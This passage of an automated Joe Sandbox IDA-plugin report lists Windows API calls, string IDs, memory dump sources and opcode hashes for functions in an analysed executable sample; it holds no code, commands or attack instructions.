                                        • API ID: CurrentOpenProcessThreadToken
                                        • String ID:
                                        • API String ID: 3974789173-0
                                        • Opcode ID: 6d6b8f2c8ea114c61ca6f769328dd5256c3fc9f82c5ddc40d7a1d1754150bd60
                                        • Instruction ID: b0c11a9704009dc9715d6de6aade8f5df70d5812c25ad7f230e91cdd2490363d
                                        • Opcode Fuzzy Hash: 6d6b8f2c8ea114c61ca6f769328dd5256c3fc9f82c5ddc40d7a1d1754150bd60
                                        • Instruction Fuzzy Hash: 07E08635601211DBD7201FB0AD8DB8A3B7CEF457D2F194808FA55CA090DB344585C778
                                        APIs
                                        • GetDesktopWindow.USER32 ref: 00C4D858
                                        • GetDC.USER32(00000000), ref: 00C4D862
                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C4D882
                                        • ReleaseDC.USER32(?), ref: 00C4D8A3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        • Opcode ID: a290cddafe088fc6029b0f3424163f0e4d3ae212e65e81686c957cc7ef79d8a9
                                        • Instruction ID: bf4056c9b0dced0bc7e031d2ba373b0a62a63638d07143cc7ef3468f5396bde0
                                        • Opcode Fuzzy Hash: a290cddafe088fc6029b0f3424163f0e4d3ae212e65e81686c957cc7ef79d8a9
                                        • Instruction Fuzzy Hash: 45E01AB4800205DFCB41AFB1D94876DFBB1FB08311F108059F91AE7250D7384945AF64
                                        APIs
                                        • GetDesktopWindow.USER32 ref: 00C4D86C
                                        • GetDC.USER32(00000000), ref: 00C4D876
                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C4D882
                                        • ReleaseDC.USER32(?), ref: 00C4D8A3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        • Opcode ID: c47fec8f3600365eb9d2f4d574572108692a5e9aa3d0e9306dd49b710edb8b12
                                        • Instruction ID: 43601f1b6d3c4643480e50f8f466a6d23e5473367d7ed9bc738f9f2718793e14
                                        • Opcode Fuzzy Hash: c47fec8f3600365eb9d2f4d574572108692a5e9aa3d0e9306dd49b710edb8b12
                                        • Instruction Fuzzy Hash: 3CE012B4800204EFCB40AFB0E88876DFBB1BB08311B108058F91AE7250DB385905AF64
                                        APIs
                                          • Part of subcall function 00BF7620: _wcslen.LIBCMT ref: 00BF7625
                                        • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00C64ED4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Connection_wcslen
                                        • String ID: *$LPT
                                        • API String ID: 1725874428-3443410124
                                        • Opcode ID: a9db48f73f326e049677587c1fd732454f71b413b59dbfb067b4f805f278271f
                                        • Instruction ID: 793b84a269d98c27fd890abc362540a6d27fbbc6df5df0a50decbe58d391944b
                                        • Opcode Fuzzy Hash: a9db48f73f326e049677587c1fd732454f71b413b59dbfb067b4f805f278271f
                                        • Instruction Fuzzy Hash: 70915175A002049FCB28DF98C4D4EA9BBF1BF44304F158099E81A9F7A2D775EE85CB91
                                        APIs
                                        • __startOneArgErrorHandling.LIBCMT ref: 00C1E30D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ErrorHandling__start
                                        • String ID: pow
                                        • API String ID: 3213639722-2276729525
                                        • Opcode ID: 864a546ba863e2d4662fc3beea44935c479c864749ebae46bb4396d9f62133f4
                                        • Instruction ID: 9efd62a08f875ebff9800a10580e576055ec4c249b6dfaee1e749cbeec088981
                                        • Opcode Fuzzy Hash: 864a546ba863e2d4662fc3beea44935c479c864749ebae46bb4396d9f62133f4
                                        • Instruction Fuzzy Hash: FF519E71A0C1129ACB157724D9813FE3B94AB01740F748A99E8F5C26F9DB348DC1BA46
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #
                                        • API String ID: 0-1885708031
                                        • Opcode ID: be45ba6c070084ce9f279599bec06daf4fe43e537025337c021e4f2ac3203c79
                                        • Instruction ID: 5d8051546ac064cdc2367e6fd49be4da2dfa939cf10fda73b921460a65d33163
                                        • Opcode Fuzzy Hash: be45ba6c070084ce9f279599bec06daf4fe43e537025337c021e4f2ac3203c79
                                        • Instruction Fuzzy Hash: 3B512175940246DFDB15DF28C481ABE7BA8FF56320F254459ECA19B2D0D7349E42CBA0
                                        APIs
                                        • Sleep.KERNEL32(00000000), ref: 00C0F2A2
                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 00C0F2BB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: GlobalMemorySleepStatus
                                        • String ID: @
                                        • API String ID: 2783356886-2766056989
                                        • Opcode ID: b2f6188531d9bf148cd4dc5fd884944f76dab477c3a489581a6ea441dcb9613c
                                        • Instruction ID: c7730ab8ad7d3dbf70396a6eed3e092fd6c17b73ae583b2fdd527db27c52f234
                                        • Opcode Fuzzy Hash: b2f6188531d9bf148cd4dc5fd884944f76dab477c3a489581a6ea441dcb9613c
                                        • Instruction Fuzzy Hash: C45126714087499BD320AF14D886BAFFBE8FF85304F81489DF29942195EF30896DCB66
                                        APIs
                                        • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00C757E0
                                        • _wcslen.LIBCMT ref: 00C757EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper_wcslen
                                        • String ID: CALLARGARRAY
                                        • API String ID: 157775604-1150593374
                                        • Opcode ID: 084170cc9fde4d910ee89857a5fbc95e5d2dc0d9c5842d2fc384c32135f16e0b
                                        • Instruction ID: 42181ac814f45107fbf1c09e18abccd0ab76478c03b85662d71965eeff57b5d7
                                        • Opcode Fuzzy Hash: 084170cc9fde4d910ee89857a5fbc95e5d2dc0d9c5842d2fc384c32135f16e0b
                                        • Instruction Fuzzy Hash: A841C171E001099FCB04DFA9C8819BEBBF5FF59364F10806DE519A7291E7709E81CBA1
                                        APIs
                                        • _wcslen.LIBCMT ref: 00C6D130
                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C6D13A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CrackInternet_wcslen
                                        • String ID: |
                                        • API String ID: 596671847-2343686810
                                        • Opcode ID: ed94fca91485c379aca0ad4829ce5786b7fafd945b5f70b5d16ec2fdfb40b9a3
                                        • Instruction ID: e76f84f0ab941ef7def5adef6940e496203d251e3d0cc0881554cae1d5654789
                                        • Opcode Fuzzy Hash: ed94fca91485c379aca0ad4829ce5786b7fafd945b5f70b5d16ec2fdfb40b9a3
                                        • Instruction Fuzzy Hash: 1B314D71D00209ABCF15EFA5CC85EEEBFB9FF05350F000059F919A6162E771AA5ADB60
                                        APIs
                                        • DestroyWindow.USER32(?,?,?,?), ref: 00C83621
                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00C8365C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$DestroyMove
                                        • String ID: static
                                        • API String ID: 2139405536-2160076837
                                        • Opcode ID: a453b0b055fdc71591ec1b40419c0d43e657289a036fccb0d02857927f6486a6
                                        • Instruction ID: 3c564f7fcac28fefafd16b241db1aad7c9bcca2a8631bcecad7b2e9f3577fbd6
                                        • Opcode Fuzzy Hash: a453b0b055fdc71591ec1b40419c0d43e657289a036fccb0d02857927f6486a6
                                        • Instruction Fuzzy Hash: 53318F71110644AADB10EF28DC80FFB73A9FF48B28F10961DF9A597290DA30AD91D768
                                        APIs
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00C8461F
                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C84634
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: '
                                        • API String ID: 3850602802-1997036262
                                        • Opcode ID: 58c0bf4cb8585c487884738a1fba47b65a55aa863543622ba01e1781bbd0bc85
                                        • Instruction ID: 3d9e1262fb6c64a45d0854d54a92904fda9624beb2dbd5d6e096414175d83f18
                                        • Opcode Fuzzy Hash: 58c0bf4cb8585c487884738a1fba47b65a55aa863543622ba01e1781bbd0bc85
                                        • Instruction Fuzzy Hash: ED3138B4A0030A9FDB18DFA9C980BDE7BB5FF09304F14406AE904AB341E770AA41CF94
                                        APIs
                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C8327C
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C83287
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: Combobox
                                        • API String ID: 3850602802-2096851135
                                        • Opcode ID: 739588a00058e5d55be2ccf43e5e422dbdc2817843629d77b81c1a69f5f7543c
                                        • Instruction ID: 1dafb10aa1413c6a2204a7d56425ff8cd8708dccddc22d33163c915db9cdbd4d
                                        • Opcode Fuzzy Hash: 739588a00058e5d55be2ccf43e5e422dbdc2817843629d77b81c1a69f5f7543c
                                        • Instruction Fuzzy Hash: D911E2713002487FEF21AE54DC80FBB376AEB94768F101228F92897292D631AE518764
                                        APIs
                                          • Part of subcall function 00BF600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00BF604C
                                          • Part of subcall function 00BF600E: GetStockObject.GDI32(00000011), ref: 00BF6060
                                          • Part of subcall function 00BF600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF606A
                                        • GetWindowRect.USER32(00000000,?), ref: 00C8377A
                                        • GetSysColor.USER32(00000012), ref: 00C83794
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                        • String ID: static
                                        • API String ID: 1983116058-2160076837
                                        • Opcode ID: 1583a81fb40189bf1257e45f51f3f902adf898ad6d3193c4026d62ebc95db900
                                        • Instruction ID: f08380e374be78e4e506e5e0f804627e340e18cbe26ecf7e2509acc838ebd800
                                        • Opcode Fuzzy Hash: 1583a81fb40189bf1257e45f51f3f902adf898ad6d3193c4026d62ebc95db900
                                        • Instruction Fuzzy Hash: 9E1159B2610209AFDF00EFA8CC45EFE7BB8EB08308F005524FD65E2250E734E9109B60
                                        APIs
                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C6CD7D
                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C6CDA6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Internet$OpenOption
                                        • String ID: <local>
                                        • API String ID: 942729171-4266983199
                                        • Opcode ID: b5c03eeda29ff263acfbd48c2b5d09d5a2587ea353bf130ee3192266abd8210b
                                        • Instruction ID: abcf164a751b3d454848de318ccff305f96f74dc60a7e754d95ed7df78063859
                                        • Opcode Fuzzy Hash: b5c03eeda29ff263acfbd48c2b5d09d5a2587ea353bf130ee3192266abd8210b
                                        • Instruction Fuzzy Hash: B411A071205631BAD7385B66CCC9FF7BEA8EB127A4F00422AF19982080D6749954D6F0
                                        APIs
                                        • GetWindowTextLengthW.USER32(00000000), ref: 00C834AB
                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00C834BA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: LengthMessageSendTextWindow
                                        • String ID: edit
                                        • API String ID: 2978978980-2167791130
                                        • Opcode ID: 7ba17cc64cf2a16271205dbdc47ea606028265c67a83fd394d982370cef33833
                                        • Instruction ID: ab4ea51cbbb6b0f8202e8ba619fdc28f8896cc75a19fa924810e02f8df9be077
                                        • Opcode Fuzzy Hash: 7ba17cc64cf2a16271205dbdc47ea606028265c67a83fd394d982370cef33833
                                        • Instruction Fuzzy Hash: 1511DD31100108AAEB12AE64DC84BBB3B6AEF81B78F505324F930931D0C731DE519B68
                                        APIs
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                        • CharUpperBuffW.USER32(?,?,?), ref: 00C56CB6
                                        • _wcslen.LIBCMT ref: 00C56CC2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _wcslen$BuffCharUpper
                                        • String ID: STOP
                                        • API String ID: 1256254125-2411985666
                                        • Opcode ID: 5ad1353451c7ebae83d0d8842dce156d0aa013bc74b76988fe60bbff6a06488a
                                        • Instruction ID: b7a01544dd14d377ed8c6c6460b7df461c260af6b319f9ede6bdc68dfbc2e277
                                        • Opcode Fuzzy Hash: 5ad1353451c7ebae83d0d8842dce156d0aa013bc74b76988fe60bbff6a06488a
                                        • Instruction Fuzzy Hash: EF01C43661052A8ACB219FFDDC809BF77B5EB61721B900924EC6297190FA31EA88C654
                                        APIs
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                          • Part of subcall function 00C53CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C53CCA
                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C51D4C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        • Opcode ID: 71e46f9c77f275a12c83f801404b5623d21108f5ca086fda43397bab91badf6a
                                        • Instruction ID: cd6b37da0013a6f0c522652ceda473a3b01f66f4640500dc00609cd2a04f11d4
                                        • Opcode Fuzzy Hash: 71e46f9c77f275a12c83f801404b5623d21108f5ca086fda43397bab91badf6a
                                        • Instruction Fuzzy Hash: C501D479601218AB8B09EFA4CC55FFE77B8EF46390B08061AFC32672C1EA31594C8764
                                        APIs
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                          • Part of subcall function 00C53CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C53CCA
                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C51C46
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        • Opcode ID: ee60db606696d3acb54514e5abc73c500750b73dff70221447610834bb471b35
                                        • Instruction ID: fc4b0b93ba1cdc19af999027bfa4db4122e0f7a1ec4fe83c2862bdda3db58127
                                        • Opcode Fuzzy Hash: ee60db606696d3acb54514e5abc73c500750b73dff70221447610834bb471b35
                                        • Instruction Fuzzy Hash: 5D01A77968110867CB04EF90C955BFF77E8DF11381F180069FD1667282EA21AF4CD6B9
                                        APIs
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                          • Part of subcall function 00C53CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C53CCA
                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00C51CC8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        • Opcode ID: c72597ac0efdaf3ad616bf629f92be7e4a2c342b4e6551610675021d21b17205
                                        • Instruction ID: 0875503f693a3f0acd49bbcdca5bce674005bc4710f55047d15c429f83af0a9f
                                        • Opcode Fuzzy Hash: c72597ac0efdaf3ad616bf629f92be7e4a2c342b4e6551610675021d21b17205
                                        • Instruction Fuzzy Hash: 5601D67969015867CB04EBA5CA05BFE77EC9B113C1F180025BD12B3281EA22AF4CD679
                                        APIs
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                          • Part of subcall function 00C53CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C53CCA
                                        • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00C51DD3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
